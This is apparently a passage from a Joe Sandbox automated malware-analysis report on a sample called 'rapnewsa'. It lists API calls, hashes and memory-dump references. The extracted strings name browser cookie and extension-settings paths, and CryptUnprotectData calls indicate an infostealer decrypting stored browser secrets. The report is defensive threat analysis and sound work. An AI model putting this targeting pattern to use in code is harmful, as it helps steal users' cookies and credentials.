                            • API ID: AllocateHeap
                            • String ID:
                            • API String ID: 1279760036-0
                            • Opcode ID: 53703c41831ba45968550d2fc4992de17640edbdf37cd5bde9b5c6677a47359f
                            • Instruction ID: b2b6899771630233cd5b17dd9a000eb49629b6d2a59b886997063452e417665d
                            • Opcode Fuzzy Hash: 53703c41831ba45968550d2fc4992de17640edbdf37cd5bde9b5c6677a47359f
                            • Instruction Fuzzy Hash: DDC04C7D170208ABD704DBD8ED55E6A3B9CA789601F404508B6094A590DB62E8018760
                            APIs
                            • Sleep.KERNELBASE(000003E8), ref: 00A42E41
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 5e94a227f48ff07cae11e24e6e5951c846a25af3f0445f5dee8fe3b4f513a826
                            • Instruction ID: 11d9d62c227436faf38c4951fa8b5ecf726479fa79097951c919809d22155bbe
                            • Opcode Fuzzy Hash: 5e94a227f48ff07cae11e24e6e5951c846a25af3f0445f5dee8fe3b4f513a826
                            • Instruction Fuzzy Hash: 06114C78900208E7CB14CF45D551ABDBBB5FF98301FA08198F9068B381E735DE91E7A5
                            APIs
                            • Sleep.KERNELBASE(00000001,00000C58,00000001), ref: 00A42AF6
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: Sleep
                            • String ID:
                            • API String ID: 3472027048-0
                            • Opcode ID: 4ef8044f5ac563d5fdbfac4cee47cf47e90efaf14c43f11e8131432087559a79
                            • Instruction ID: a0d2b1e71e7c72c145519e2f044e63e187c9c4eda8293a326c80a999d01929a0
                            • Opcode Fuzzy Hash: 4ef8044f5ac563d5fdbfac4cee47cf47e90efaf14c43f11e8131432087559a79
                            • Instruction Fuzzy Hash: BC118C38800219E6DB24DF95D5417BC77B2BF94740FA040B9FD422A681E7B95F80E391
                            APIs
                            • NtQueryObject.NTDLL(00A41593,00000001,?,00000000,00000000), ref: 00A4166E
                            • NtQueryObject.NTDLL(00A41593,00000001,?,00000000,00000000), ref: 00A41689
                            Strings
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: ObjectQuery
                            • String ID: \Local Extensions Settings\$\Network\Cookies
                            • API String ID: 2748340528-1141476384
                            • Opcode ID: 03f7c0c0fef40e1b791e0b4acd96f808b29cbfb2f31c7f32200c5193fbef67dc
                            • Instruction ID: 849d871df4afa5287f6b07fe99bb584745dad57b0a1e5c602cb3e1d7cc88310c
                            • Opcode Fuzzy Hash: 03f7c0c0fef40e1b791e0b4acd96f808b29cbfb2f31c7f32200c5193fbef67dc
                            • Instruction Fuzzy Hash: 4121637DA10208BBDB10CB90DD41FDAB779ABC8705F108495B908D7281EAB1EEC4CBA1
                            APIs
                            • CryptSignHashA.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,?,00A416EB,?,00A41CA8,?,00A41D86,?), ref: 00A41C53
                            • CryptUpdateProtectedState.CRYPT32(00000000,00000000,00000000,00000000,00000000,?,00A416EB,?,00A41CA8,?,00A41D86,?), ref: 00A41C63
                            • WinHttpTimeFromSystemTime.WINHTTP(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00A416EB,?,00A41CA8,?,00A41D86,?), ref: 00A41C6C
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CryptTime$FromHashHttpProtectedSignStateSystemUpdate
                            • String ID:
                            • API String ID: 3068283267-0
                            • Opcode ID: 4c57ef4c69f3dd837455790323daee97ba1ffafa26051c3c9159098da65bc9f4
                            • Instruction ID: 8cb8ea2e21177a4525e7eefb6e9863ef81387e6bb94ed56c2186f9ebed76eb5b
                            • Opcode Fuzzy Hash: 4c57ef4c69f3dd837455790323daee97ba1ffafa26051c3c9159098da65bc9f4
                            • Instruction Fuzzy Hash: EBC04C3D3C830566E6506BF06E0BB16375867D6B07F444054F30E980D19ED264114567
                            APIs
                            • CryptUnprotectData.CRYPT32(00000040,00000000,00000000,00000000,00000000,00000000,?), ref: 00A41033
                              • Part of subcall function 00A432A0: LocalFree.KERNEL32(?), ref: 00A433BA
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID: CryptDataFreeLocalUnprotect
                            • String ID:
                            • API String ID: 1561624719-0
                            • Opcode ID: b90ef403e56ee99f7709b66b251991402f596fd1da067321a69f2d5c7f71b651
                            • Instruction ID: 9fec1def134d910736a112d036a417720167404d2cb708d55c17b3c7048ded16
                            • Opcode Fuzzy Hash: b90ef403e56ee99f7709b66b251991402f596fd1da067321a69f2d5c7f71b651
                            • Instruction Fuzzy Hash: C7F01C7A90010CAFDB04DFA8C885EFE77BCEB84314F04856AE9199B241EB31D654CBA0
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c43602ed676e7627ec8738c8a54b05c9f01cfc2936e14476b38f24f0838f3492
                            • Instruction ID: dde1bd9cb31a665840506e36bab9cafb4a2a57d73163620a88bf4db403f7ce3c
                            • Opcode Fuzzy Hash: c43602ed676e7627ec8738c8a54b05c9f01cfc2936e14476b38f24f0838f3492
                            • Instruction Fuzzy Hash: 813175B4D00209EFDB14DF98E941BAEBBF4EF44304F20C06DEA49A7341D774AA819B95
                            Memory Dump Source
                            • Source File: 00000013.00000002.2038233759.0000000000A41000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A40000, based on PE: true
                            • Associated: 00000013.00000002.2038211856.0000000000A40000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038250659.0000000000A4A000.00000002.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038265989.0000000000A4B000.00000004.00000001.01000000.00000006.sdmpDownload File
                            • Associated: 00000013.00000002.2038280732.0000000000A4C000.00000002.00000001.01000000.00000006.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_19_2_a40000_rapnewsa.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                            • Instruction ID: 3aed54436f5767a83b01f55326dea564c088d466d319321e9a1229c6b183aa19
                            • Opcode Fuzzy Hash: 3585cc5e86e4b4f2c0b231822883ac188ad7ac996d5f3a190238e1ab2981f7b1
                            • Instruction Fuzzy Hash: DCC04C7595664CEBC711CB89D541A59B7FCE709650F100195EC0893700D5356E109595